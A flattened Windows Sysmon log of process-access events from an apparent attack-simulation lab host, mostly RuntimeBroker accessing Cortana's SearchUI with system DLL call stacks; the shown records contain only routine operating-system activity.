10:40:45.172{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.156{C8EA50B7-F2AD-6215-B800-000000003802}43484048C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\System32\windows.storage.dll+b7e0d|C:\Windows\System32\windows.storage.dll+ba4f0|C:\Windows\System32\windows.storage.dll+ebba4|C:\Windows\System32\windows.storage.dll+e929b|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15f51|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+61d3f|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+5e426|C:\Windows\System32\combase.dll+5dbda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\windows.cortana.onecore.dll+12bc0 10341000x8000000000000000285842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.156{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.156{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e 10341000x8000000000000000285840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.156{C8EA50B7-F2AD-6215-B800-000000003802}43484048C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\System32\windows.storage.dll+b7e0d|C:\Windows\System32\windows.storage.dll+1475c6|C:\Windows\System32\windows.storage.dll+148f28|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+3d39b|C:\Windows\System32\combase.dll+3ec72|C:\Windows\System32\combase.dll+63c23|C:\Windows\System32\combase.dll+3e72d|C:\Windows\System32\combase.dll+61f6f|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+5e426|C:\Windows\System32\combase.dll+5dbda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000285839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.156{C8EA50B7-F2AD-6215-B800-000000003802}43484048C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\System32\windows.storage.dll+b7e0d|C:\Windows\System32\windows.storage.dll+ba4f0|C:\Windows\System32\windows.storage.dll+ebba4|C:\Windows\System32\windows.storage.dll+e929b|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+3d39b|C:\Windows\System32\combase.dll+3ec72|C:\Windows\System32\combase.dll+63c23|C:\Windows\System32\combase.dll+3e72d|C:\Windows\System32\combase.dll+61f6f|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+5e426|C:\Windows\System32\combase.dll+5dbda 10341000x8000000000000000285838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e 10341000x8000000000000000285836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43485720C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43485720C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e 10341000x8000000000000000285833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e 10341000x8000000000000000285832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43484432C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43484432C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e 10341000x8000000000000000285830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.141{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll